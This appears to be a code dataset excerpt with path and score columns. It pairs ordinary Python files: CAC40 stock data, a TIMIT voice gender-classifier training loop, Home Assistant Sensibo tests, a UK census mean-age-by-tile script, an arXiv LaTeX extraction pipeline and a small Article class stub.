'STMICROELECTRONICS' : [16.4, 15.0e9, 'Technology'],
'THALES' : [65.8, 14.0e9, 'Industrials'],
'LEGRAND' : [50.8, 13.6e9, 'Industrials'],
'SAINT-GOBAIN' : [19.4, 10.5e9, 'Industrials'],
'MICHELIN' : [71.0, 12.7e9, 'Consumer goods'],
'CAPGEMINI' : [62.7, 10.6e9, 'Technology'],
'PSA' : [11.0, 9.98e9, 'Consumer goods'],
'UNIBAIL-RODAMCO-WESTFIELD' : [58.1, 8.04e9, 'Financials'],
'VEOLIA' : [17.5, 9.95e9, 'Utilities'],
'BOUYGUES' : [24.2, 9.20e9, 'Industrials'],
'ARCELORMITTAL' : [7.19, 7.34e9, 'Basic materials'],
'SODEXO' : [56.5, 8.33e9, 'Consumer services'],
'CARREFOUR' : [12.9, 10.4e9, 'Consumer services'],
'ACCOR' : [24.2, 6.54e9, 'Consumer services'],
'PUBLICIS' : [22.9, 5.51e9, 'Consumer services'],
'RENAULT' : [14.6, 4.30e9, 'Consumer goods'],
'ATOS' : [47.6, 5.20e9, 'Technology'],
'TECHNIPFMC' : [5.92, 2.65e9, 'Oil and gas']
} | catbars/cac40.py | date = '16/03/2020'
data = {
'LVMH': [298, 150e9, 'Consumer goods'] ,
'L\'OREAL': [208, 116e9, 'Consumer goods'],
'SANOFI' : [77.0, 96.0e9, 'Health care'],
'AIRBUS' : [69, 54.0e9, 'Industrials'],
'TOTAL' : [24.3, 63.3e9, 'Oil and gas'],
'HERMES' : [548, 57.9e9, 'Consumer goods'],
'KERING' : [378, 47.7e9, 'Consumer services'],
'AIR LIQUIDE' : [99.2, 47.0e9, 'Basic materials'],
'BNP PARIBAS' : [27.4, 34.3e9, 'Financials'],
'VINCI' : [59.0, 35.8e9, 'Industrials'],
'ESSILORLUXOTTICA' : [96.0, 41.9e9, 'Health care'],
'SCHNEIDER ELECTRIC' : [70.4, 41.0e9, 'Industrials'],
'AXA' : [13.4, 32.5e9, 'Financials'],
'SAFRAN' : [74.5, 29.9e9, 'Industrials'],
'DANONE' : [54.0, 37.0e9, 'Consumer goods'],
'<NAME>' : [122, 32.4e9, 'Consumer goods'],
'ENGIE' : [10.0, 24.3e9, 'Utilities'],
'DASSAULT SYSTEMES' : [108, 28.5e9, 'Technology'],
'ORANGE' : [9.40, 25.0e9, 'Telecommunications'],
'CREDIT AGRICOLE' : [6.08, 17.5e9, 'Financials'],
'VIVENDI' : [17.6, 20.8e9, 'Consumer services'],
'SOCIETE GENERALE' : [14.5, 12.4e9,'Financials'],
'STMICROELECTRONICS' : [16.4, 15.0e9, 'Technology'],
'THALES' : [65.8, 14.0e9, 'Industrials'],
'LEGRAND' : [50.8, 13.6e9, 'Industrials'],
'SAINT-GOBAIN' : [19.4, 10.5e9, 'Industrials'],
'MICHELIN' : [71.0, 12.7e9, 'Consumer goods'],
'CAPGEMINI' : [62.7, 10.6e9, 'Technology'],
'PSA' : [11.0, 9.98e9, 'Consumer goods'],
'UNIBAIL-RODAMCO-WESTFIELD' : [58.1, 8.04e9, 'Financials'],
'VEOLIA' : [17.5, 9.95e9, 'Utilities'],
'BOUYGUES' : [24.2, 9.20e9, 'Industrials'],
'ARCELORMITTAL' : [7.19, 7.34e9, 'Basic materials'],
'SODEXO' : [56.5, 8.33e9, 'Consumer services'],
'CARREFOUR' : [12.9, 10.4e9, 'Consumer services'],
'ACCOR' : [24.2, 6.54e9, 'Consumer services'],
'PUBLICIS' : [22.9, 5.51e9, 'Consumer services'],
'RENAULT' : [14.6, 4.30e9, 'Consumer goods'],
'ATOS' : [47.6, 5.20e9, 'Technology'],
'TECHNIPFMC' : [5.92, 2.65e9, 'Oil and gas']
} | 0.331661 | 0.338282 |
import torch
from torch.optim import Adam
import torch.nn as nn
import torch.nn.functional as F
from tqdm import tqdm
import os
from utils.preprocess import timit_dataloader, dataloader
from sklearn.metrics import accuracy_score
from gender_detector.model import Model
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(f'using {device} mode')
patience = 500
best_loss = 1000
cnt = 0
if __name__ == '__main__':
# os.mkdir('gender_detector/checkpoint')
model = Model()
if device == torch.device('cuda'):
model.cuda()
else:
model.cpu()
model.train()
_timit_dataloader = timit_dataloader()
train, valid, test = _timit_dataloader.return_data()
trainset = dataloader(*train)
validset = dataloader(*valid)
testset = dataloader(*test)
BATCH_SIZE = 64
optimizer = Adam(
[p for p in model.parameters() if p.requires_grad], betas=(0.9, 0.999), eps=1e-5
)
for i in tqdm(range(1000)):
optimizer.zero_grad()
input, target = trainset.next_batch(BATCH_SIZE, device=device)
out = model(input)
loss = model.loss(out, target)
loss.backward()
optimizer.step()
if i % 50 == 0:
model.eval()
with torch.no_grad():
optimizer.zero_grad()
input, target = validset.next_batch(BATCH_SIZE, device=device)
out = model(input)
valid_loss = model.loss(out, target)
out, target = out.cpu().detach().numpy(), target.cpu().detach().numpy()
# print(out, target)
out = [1. if tmp > 0.5 else 0 for tmp in out]
print(f'accuracy_score:{accuracy_score(out, target)}')
print("i {}, valid {}".format(i, valid_loss.item()))
print("_________")
model.train()
if i % 50 == 0 and best_loss > valid_loss.item():
print('new best')
best_loss = valid_loss.item()
torch.save(model.state_dict(), "gender_detector/checkpoint/best.pt".format(i))
cnt = 0
else:
cnt += 1
if cnt > patience:
break
print('training finished') | gender_detector/train.py | import torch
from torch.optim import Adam
import torch.nn as nn
import torch.nn.functional as F
from tqdm import tqdm
import os
from utils.preprocess import timit_dataloader, dataloader
from sklearn.metrics import accuracy_score
from gender_detector.model import Model
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(f'using {device} mode')
patience = 500
best_loss = 1000
cnt = 0
if __name__ == '__main__':
# os.mkdir('gender_detector/checkpoint')
model = Model()
if device == torch.device('cuda'):
model.cuda()
else:
model.cpu()
model.train()
_timit_dataloader = timit_dataloader()
train, valid, test = _timit_dataloader.return_data()
trainset = dataloader(*train)
validset = dataloader(*valid)
testset = dataloader(*test)
BATCH_SIZE = 64
optimizer = Adam(
[p for p in model.parameters() if p.requires_grad], betas=(0.9, 0.999), eps=1e-5
)
for i in tqdm(range(1000)):
optimizer.zero_grad()
input, target = trainset.next_batch(BATCH_SIZE, device=device)
out = model(input)
loss = model.loss(out, target)
loss.backward()
optimizer.step()
if i % 50 == 0:
model.eval()
with torch.no_grad():
optimizer.zero_grad()
input, target = validset.next_batch(BATCH_SIZE, device=device)
out = model(input)
valid_loss = model.loss(out, target)
out, target = out.cpu().detach().numpy(), target.cpu().detach().numpy()
# print(out, target)
out = [1. if tmp > 0.5 else 0 for tmp in out]
print(f'accuracy_score:{accuracy_score(out, target)}')
print("i {}, valid {}".format(i, valid_loss.item()))
print("_________")
model.train()
if i % 50 == 0 and best_loss > valid_loss.item():
print('new best')
best_loss = valid_loss.item()
torch.save(model.state_dict(), "gender_detector/checkpoint/best.pt".format(i))
cnt = 0
else:
cnt += 1
if cnt > patience:
break
print('training finished') | 0.540439 | 0.303113 |
from __future__ import annotations
from unittest.mock import patch
from homeassistant import config_entries
from homeassistant.components.sensibo.const import DOMAIN
from homeassistant.components.sensibo.util import NoUsernameError
from homeassistant.config_entries import SOURCE_USER
from homeassistant.core import HomeAssistant
from . import ENTRY_CONFIG
from .response import DATA_FROM_API
from tests.common import MockConfigEntry
async def test_setup_entry(hass: HomeAssistant) -> None:
"""Test setup entry."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=2,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
async def test_migrate_entry(hass: HomeAssistant) -> None:
"""Test migrate entry unique id."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=1,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
assert entry.version == 2
assert entry.unique_id == "username"
async def test_migrate_entry_fails(hass: HomeAssistant) -> None:
"""Test migrate entry unique id."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=1,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
side_effect=NoUsernameError("No username returned"),
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.MIGRATION_ERROR
assert entry.version == 1
assert entry.unique_id == "12"
async def test_unload_entry(hass: HomeAssistant) -> None:
"""Test unload an entry."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version="2",
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
assert await hass.config_entries.async_unload(entry.entry_id)
await hass.async_block_till_done()
assert entry.state is config_entries.ConfigEntryState.NOT_LOADED | tests/components/sensibo/test_init.py | from __future__ import annotations
from unittest.mock import patch
from homeassistant import config_entries
from homeassistant.components.sensibo.const import DOMAIN
from homeassistant.components.sensibo.util import NoUsernameError
from homeassistant.config_entries import SOURCE_USER
from homeassistant.core import HomeAssistant
from . import ENTRY_CONFIG
from .response import DATA_FROM_API
from tests.common import MockConfigEntry
async def test_setup_entry(hass: HomeAssistant) -> None:
"""Test setup entry."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=2,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
async def test_migrate_entry(hass: HomeAssistant) -> None:
"""Test migrate entry unique id."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=1,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
assert entry.version == 2
assert entry.unique_id == "username"
async def test_migrate_entry_fails(hass: HomeAssistant) -> None:
"""Test migrate entry unique id."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=1,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
side_effect=NoUsernameError("No username returned"),
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.MIGRATION_ERROR
assert entry.version == 1
assert entry.unique_id == "12"
async def test_unload_entry(hass: HomeAssistant) -> None:
"""Test unload an entry."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version="2",
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
assert await hass.config_entries.async_unload(entry.entry_id)
await hass.async_block_till_done()
assert entry.state is config_entries.ConfigEntryState.NOT_LOADED | 0.724968 | 0.227523 |
import __main__ as main
import sys
import geopandas as gpd
import pandas as pd
import numpy as np
if not hasattr(main, '__file__'):
argv = ['code', 'data/processed/geo/tiles.shp',
'data/processed/census/oa_tile_reference.csv',
'data/raw/census/engwal_OA_lsoa.csv',
'data/raw/census/OA_to_DZ.csv',
'data/raw/census/NI_SA_Centroids.shp',
'data/raw/age_data/ew_age.csv',
'data/raw/age_data/QS103SC.csv',
'data/raw/age_data/KS102NI (s).csv',
'data/raw/census/Eng_Wal_OA_Mid_Pop.csv',
'data/raw/census/simd2020_withinds.csv',
'data/raw/census/NI_Mid_Pop.csv',
'data/processed/census/quadkey_mean_age.csv']
else:
argv = sys.argv
tiles = gpd.read_file(argv[1])
tiles.crs = 4326
oa_tile_lookup = pd.read_csv(argv[2])
oa_lus = {'england': pd.read_csv(argv[3]),
'scotland': pd.read_csv(argv[4]),
'ni': gpd.read_file(argv[5])}
oa_lus['ni'] = oa_lus['ni'].loc[:, ['SA2011', 'SOA2011']]
age_data = {'england': pd.read_csv(argv[6]),
'scotland': pd.read_csv(argv[7]),
'ni': pd.read_csv(argv[8])}
scotland_imd = pd.read_csv(argv[10])
pop_data = {'england': pd.read_csv(argv[9]),
'scotland': pd.read_csv(argv[10]),
'ni': pd.read_csv(argv[11])}
scotland_n_oas = oa_lus['scotland'].groupby('DataZone2011Code').count().reset_index()[['DataZone2011Code', 'OutputArea2011Code']].rename(columns = {'DataZone2011Code':'DZ', 'OutputArea2011Code':'n_oas'})
scotland_pop = pd.merge(scotland_imd, scotland_n_oas)[['DZ', 'Total_population', 'n_oas']]
scotland_pop = pd.merge(oa_lus['scotland'][['OutputArea2011Code', 'DataZone2011Code']].rename(columns={'OutputArea2011Code':'OA', 'DataZone2011Code':'DZ'}), scotland_pop)
scotland_pop['Total_population'] = scotland_pop['Total_population'] / scotland_pop['n_oas']
scotland_pop = scotland_pop.drop(columns = ['n_oas', 'DZ']).rename(columns = {'Total_population':'pop'})
wm_e = lambda x: np.average(x, weights=age_data['england'].loc[x.index, "value"])
age_data['england'] = pd.melt(age_data['england'], id_vars = ['Area Codes'], value_vars = age_data['england'].columns[4:])
age_data['england']['variable'] = [str(x).replace('+', '') for x in age_data['england']['variable']]
age_data['england']['variable'] = pd.to_numeric(age_data['england']['variable'], errors = 'coerce')
age_data['england'] = age_data['england'].groupby(['Area Codes']).agg(mean_age = ('variable', wm_e)).reset_index()
# Scotland
wm_s = lambda x: np.average(x, weights=age_data['scotland'].loc[x.index, "value"])
age_data['scotland'] = pd.melt(age_data['scotland'], id_vars = ['Area'], value_vars = age_data['scotland'].columns[2:])
age_data['scotland']['variable'] = [str(x).replace('Under ', '') for x in age_data['scotland']['variable']]
age_data['scotland']['variable'] = [str(x).replace(' and over', '') for x in age_data['scotland']['variable']]
age_data['scotland']['variable'] = pd.to_numeric(age_data['scotland']['variable'], errors = 'coerce')
age_data['scotland']['value'] = pd.to_numeric(age_data['scotland']['value'], errors = 'coerce')
age_data['scotland'].dropna(subset = ['value'], inplace = True)
age_data['scotland'] = age_data['scotland'].groupby(['Area']).agg(mean_age = ('variable', wm_s)).reset_index()
# This is done for ireland
age_data['ni']['Mean age of population']
'''
Merge mean ages with look up tables
'''
ew_age = pd.merge(oa_lus['england'], age_data['england'], left_on='LSOA11CD', right_on='Area Codes', how = 'left')
scotand_age = pd.merge(oa_lus['scotland'], age_data['scotland'], left_on='DataZone2011Code', right_on='Area', how = 'left')
ni_age = pd.merge(oa_lus['ni'], age_data['ni'], left_on='SOA2011', right_on='SOA Code', how = 'left')[['SA2011', 'SOA2011', 'Mean age of population']]
'''
Merge this with OA population estimates
'''
ew_age = pd.merge(ew_age, pop_data['england'], left_on='OA11CD', right_on='OA')
scotand_age = pd.merge(scotand_age, scotland_pop, left_on='OutputArea2011Code', right_on='OA')
ni_age = pd.merge(ni_age, pop_data['ni'], left_on='SA2011', right_on='Area_Code')
ew_age['country'] = ew_age['OA11CD'].astype(str).str[0]
ew_age['country'] = [str(x).replace('E', 'England') for x in ew_age['country']]
ew_age['country'] = [str(x).replace('W', 'Wales') for x in ew_age['country']]
scotand_age['country'] = 'Scotland'
ni_age['country'] = 'Northern Ireland'
ew_age = ew_age.rename(columns = {'Pop':'pop'})[['OA', 'pop', 'mean_age', 'country']]
scotand_age = scotand_age[['OA', 'pop', 'mean_age', 'country']]
ni_age = ni_age.rename(columns = {'SA2011':'OA', 'MYE':'pop', 'Mean age of population':'mean_age'})[['OA', 'pop', 'mean_age', 'country']]
age = pd.concat([ew_age, scotand_age, ni_age])
age = pd.merge(oa_tile_lookup, age, left_on = 'OA', right_on = 'OA', how = 'left')
wm = lambda x: np.average(x, weights=age.loc[x.index, "pop"])
age = age.groupby(['country', 'quadkey_12']).agg(wm_age=("mean_age", wm)).reset_index()
age.to_csv(argv[-1]) | src/data/census/tile_age.py | import __main__ as main
import sys
import geopandas as gpd
import pandas as pd
import numpy as np
if not hasattr(main, '__file__'):
argv = ['code', 'data/processed/geo/tiles.shp',
'data/processed/census/oa_tile_reference.csv',
'data/raw/census/engwal_OA_lsoa.csv',
'data/raw/census/OA_to_DZ.csv',
'data/raw/census/NI_SA_Centroids.shp',
'data/raw/age_data/ew_age.csv',
'data/raw/age_data/QS103SC.csv',
'data/raw/age_data/KS102NI (s).csv',
'data/raw/census/Eng_Wal_OA_Mid_Pop.csv',
'data/raw/census/simd2020_withinds.csv',
'data/raw/census/NI_Mid_Pop.csv',
'data/processed/census/quadkey_mean_age.csv']
else:
argv = sys.argv
tiles = gpd.read_file(argv[1])
tiles.crs = 4326
oa_tile_lookup = pd.read_csv(argv[2])
oa_lus = {'england': pd.read_csv(argv[3]),
'scotland': pd.read_csv(argv[4]),
'ni': gpd.read_file(argv[5])}
oa_lus['ni'] = oa_lus['ni'].loc[:, ['SA2011', 'SOA2011']]
age_data = {'england': pd.read_csv(argv[6]),
'scotland': pd.read_csv(argv[7]),
'ni': pd.read_csv(argv[8])}
scotland_imd = pd.read_csv(argv[10])
pop_data = {'england': pd.read_csv(argv[9]),
'scotland': pd.read_csv(argv[10]),
'ni': pd.read_csv(argv[11])}
scotland_n_oas = oa_lus['scotland'].groupby('DataZone2011Code').count().reset_index()[['DataZone2011Code', 'OutputArea2011Code']].rename(columns = {'DataZone2011Code':'DZ', 'OutputArea2011Code':'n_oas'})
scotland_pop = pd.merge(scotland_imd, scotland_n_oas)[['DZ', 'Total_population', 'n_oas']]
scotland_pop = pd.merge(oa_lus['scotland'][['OutputArea2011Code', 'DataZone2011Code']].rename(columns={'OutputArea2011Code':'OA', 'DataZone2011Code':'DZ'}), scotland_pop)
scotland_pop['Total_population'] = scotland_pop['Total_population'] / scotland_pop['n_oas']
scotland_pop = scotland_pop.drop(columns = ['n_oas', 'DZ']).rename(columns = {'Total_population':'pop'})
wm_e = lambda x: np.average(x, weights=age_data['england'].loc[x.index, "value"])
age_data['england'] = pd.melt(age_data['england'], id_vars = ['Area Codes'], value_vars = age_data['england'].columns[4:])
age_data['england']['variable'] = [str(x).replace('+', '') for x in age_data['england']['variable']]
age_data['england']['variable'] = pd.to_numeric(age_data['england']['variable'], errors = 'coerce')
age_data['england'] = age_data['england'].groupby(['Area Codes']).agg(mean_age = ('variable', wm_e)).reset_index()
# Scotland
wm_s = lambda x: np.average(x, weights=age_data['scotland'].loc[x.index, "value"])
age_data['scotland'] = pd.melt(age_data['scotland'], id_vars = ['Area'], value_vars = age_data['scotland'].columns[2:])
age_data['scotland']['variable'] = [str(x).replace('Under ', '') for x in age_data['scotland']['variable']]
age_data['scotland']['variable'] = [str(x).replace(' and over', '') for x in age_data['scotland']['variable']]
age_data['scotland']['variable'] = pd.to_numeric(age_data['scotland']['variable'], errors = 'coerce')
age_data['scotland']['value'] = pd.to_numeric(age_data['scotland']['value'], errors = 'coerce')
age_data['scotland'].dropna(subset = ['value'], inplace = True)
age_data['scotland'] = age_data['scotland'].groupby(['Area']).agg(mean_age = ('variable', wm_s)).reset_index()
# This is done for ireland
age_data['ni']['Mean age of population']
'''
Merge mean ages with look up tables
'''
ew_age = pd.merge(oa_lus['england'], age_data['england'], left_on='LSOA11CD', right_on='Area Codes', how = 'left')
scotand_age = pd.merge(oa_lus['scotland'], age_data['scotland'], left_on='DataZone2011Code', right_on='Area', how = 'left')
ni_age = pd.merge(oa_lus['ni'], age_data['ni'], left_on='SOA2011', right_on='SOA Code', how = 'left')[['SA2011', 'SOA2011', 'Mean age of population']]
'''
Merge this with OA population estimates
'''
ew_age = pd.merge(ew_age, pop_data['england'], left_on='OA11CD', right_on='OA')
scotand_age = pd.merge(scotand_age, scotland_pop, left_on='OutputArea2011Code', right_on='OA')
ni_age = pd.merge(ni_age, pop_data['ni'], left_on='SA2011', right_on='Area_Code')
ew_age['country'] = ew_age['OA11CD'].astype(str).str[0]
ew_age['country'] = [str(x).replace('E', 'England') for x in ew_age['country']]
ew_age['country'] = [str(x).replace('W', 'Wales') for x in ew_age['country']]
scotand_age['country'] = 'Scotland'
ni_age['country'] = 'Northern Ireland'
ew_age = ew_age.rename(columns = {'Pop':'pop'})[['OA', 'pop', 'mean_age', 'country']]
scotand_age = scotand_age[['OA', 'pop', 'mean_age', 'country']]
ni_age = ni_age.rename(columns = {'SA2011':'OA', 'MYE':'pop', 'Mean age of population':'mean_age'})[['OA', 'pop', 'mean_age', 'country']]
age = pd.concat([ew_age, scotand_age, ni_age])
age = pd.merge(oa_tile_lookup, age, left_on = 'OA', right_on = 'OA', how = 'left')
wm = lambda x: np.average(x, weights=age.loc[x.index, "pop"])
age = age.groupby(['country', 'quadkey_12']).agg(wm_age=("mean_age", wm)).reset_index()
age.to_csv(argv[-1]) | 0.260484 | 0.245051 |
import ray
import json
import os
import logging
import argparse
import psutil
import tqdm
import arxiv_library.io_pkg.targz as io_targz
import arxiv_library.io_pkg.metadata as io_metadata
import arxiv_library.extraction.comments as comments
import arxiv_library.extraction.imports as imports
import arxiv_library.extraction.preamble as preamble
import arxiv_library.extraction.sections as sections
import arxiv_library.extraction.equations as equations
import arxiv_library.extraction.citations as citations
import arxiv_library.compilation.mathml as mathml
@ray.remote(num_cpus=1)
def _extract(targzs):
processed = []
for gz in targzs:
try:
processed.append(io_targz.process_gz(gz))
except io_targz.EmptyFileDictException as exception:
logging.debug(exception)
except Exception as exception:
logging.warning(exception)
return processed
@ray.remote(num_cpus=1)
def _pipeline(file_dicts, json_dir, fulltext):
paper_dicts = []
for file_dict in file_dicts:
try:
file_dict = comments.remove_comments(file_dict)
paper_dict = imports.resolve_imports(file_dict)
paper_dict = preamble.extract_preamble(paper_dict)
paper_dict = sections.extract_sections(paper_dict)
paper_dict = equations.extract_equations(paper_dict)
paper_dict = citations.extract_citations(paper_dict)
if not fulltext:
del paper_dict['paper']
for section in paper_dict['sections']:
del section['latex']
paper_dict = mathml.compile_paper(paper_dict, paper_dict['arxiv_id'])
paper_dicts.append(paper_dict)
except imports.NoMainFileException as exception:
logging.debug(exception)
except Exception as exception:
logging.warning(exception)
try:
paper_dicts = io_metadata.receive_meta_data(paper_dicts)
for paper_dict in paper_dicts:
with open(os.path.join(json_dir, '{}.json'.format(paper_dict['arxiv_id'])), 'w') as file:
json.dump(paper_dict, file, indent=4)
except Exception as exception:
logging.warning(exception)
def pipeline(tar_dir, json_dir, fulltext=False):
"""
Extracts all tar files in a folder and generates corresponding paper dictionaries with keys sections, metadata,
arxiv_id, citations and preamble. For information on the dictionary structure please read the README file. These
files will be stored as json at the target directory. If fulltext is set to True, sections have another key latex,
where the fulltext for each section is stored, and the paper dictionary has an additional key paper where the full
paper is stored.
:param tar_dir: The directory where the tar files are located
:param json_dir: The directory where the json files should be saved
:param fulltext: Iff true, the paper will be stored in the paper dict with key 'paper'; default=False
"""
ray.init(log_to_driver=True)
tar_paths = os.listdir(tar_dir)
total_papers = 0
with tqdm.tqdm(total=len(tar_paths), desc='0 papers in total | tar progress') as progress:
for tar_path in (os.path.join(tar_dir, p) for p in tar_paths):
targzs = io_targz.process_tar(tar_path)
chunk_size = max(len(targzs) // (psutil.cpu_count()), 1)
remaining_chunk_ids = []
for chunk in (targzs[i:i + chunk_size] for i in range(0, len(targzs), chunk_size)):
remaining_chunk_ids.append(_extract.remote(chunk))
pipeline_ids = []
while remaining_chunk_ids:
ready_chunk_ids, remaining_chunk_ids = ray.wait(remaining_chunk_ids, num_returns=1)
for chunk_id in ready_chunk_ids:
pipeline_ids.append(_pipeline.remote(chunk_id, json_dir, fulltext))
total_papers += chunk_size
progress.set_description_str('{} papers in total | tar progress'.format(total_papers))
ray.wait(pipeline_ids, num_returns=len(pipeline_ids))
progress.update(1)
ray.shutdown() | arxiv_library/pipeline.py | import ray
import json
import os
import logging
import argparse
import psutil
import tqdm
import arxiv_library.io_pkg.targz as io_targz
import arxiv_library.io_pkg.metadata as io_metadata
import arxiv_library.extraction.comments as comments
import arxiv_library.extraction.imports as imports
import arxiv_library.extraction.preamble as preamble
import arxiv_library.extraction.sections as sections
import arxiv_library.extraction.equations as equations
import arxiv_library.extraction.citations as citations
import arxiv_library.compilation.mathml as mathml
@ray.remote(num_cpus=1)
def _extract(targzs):
processed = []
for gz in targzs:
try:
processed.append(io_targz.process_gz(gz))
except io_targz.EmptyFileDictException as exception:
logging.debug(exception)
except Exception as exception:
logging.warning(exception)
return processed
@ray.remote(num_cpus=1)
def _pipeline(file_dicts, json_dir, fulltext):
paper_dicts = []
for file_dict in file_dicts:
try:
file_dict = comments.remove_comments(file_dict)
paper_dict = imports.resolve_imports(file_dict)
paper_dict = preamble.extract_preamble(paper_dict)
paper_dict = sections.extract_sections(paper_dict)
paper_dict = equations.extract_equations(paper_dict)
paper_dict = citations.extract_citations(paper_dict)
if not fulltext:
del paper_dict['paper']
for section in paper_dict['sections']:
del section['latex']
paper_dict = mathml.compile_paper(paper_dict, paper_dict['arxiv_id'])
paper_dicts.append(paper_dict)
except imports.NoMainFileException as exception:
logging.debug(exception)
except Exception as exception:
logging.warning(exception)
try:
paper_dicts = io_metadata.receive_meta_data(paper_dicts)
for paper_dict in paper_dicts:
with open(os.path.join(json_dir, '{}.json'.format(paper_dict['arxiv_id'])), 'w') as file:
json.dump(paper_dict, file, indent=4)
except Exception as exception:
logging.warning(exception)
def pipeline(tar_dir, json_dir, fulltext=False):
"""
Extracts all tar files in a folder and generates corresponding paper dictionaries with keys sections, metadata,
arxiv_id, citations and preamble. For information on the dictionary structure please read the README file. These
files will be stored as json at the target directory. If fulltext is set to True, sections have another key latex,
where the fulltext for each section is stored, and the paper dictionary has an additional key paper where the full
paper is stored.
:param tar_dir: The directory where the tar files are located
:param json_dir: The directory where the json files should be saved
:param fulltext: Iff true, the paper will be stored in the paper dict with key 'paper'; default=False
"""
ray.init(log_to_driver=True)
tar_paths = os.listdir(tar_dir)
total_papers = 0
with tqdm.tqdm(total=len(tar_paths), desc='0 papers in total | tar progress') as progress:
for tar_path in (os.path.join(tar_dir, p) for p in tar_paths):
targzs = io_targz.process_tar(tar_path)
chunk_size = max(len(targzs) // (psutil.cpu_count()), 1)
remaining_chunk_ids = []
for chunk in (targzs[i:i + chunk_size] for i in range(0, len(targzs), chunk_size)):
remaining_chunk_ids.append(_extract.remote(chunk))
pipeline_ids = []
while remaining_chunk_ids:
ready_chunk_ids, remaining_chunk_ids = ray.wait(remaining_chunk_ids, num_returns=1)
for chunk_id in ready_chunk_ids:
pipeline_ids.append(_pipeline.remote(chunk_id, json_dir, fulltext))
total_papers += chunk_size
progress.set_description_str('{} papers in total | tar progress'.format(total_papers))
ray.wait(pipeline_ids, num_returns=len(pipeline_ids))
progress.update(1)
ray.shutdown() | 0.361503 | 0.163579 |
import datetime
import typing
class ArticleField:
"""The `ArticleField` class for the Advanced Requirements."""
def __init__(self, field_type: typing.Type[typing.Any]):
pass
class Article:
"""The `Article` class you need to write for the qualifier."""
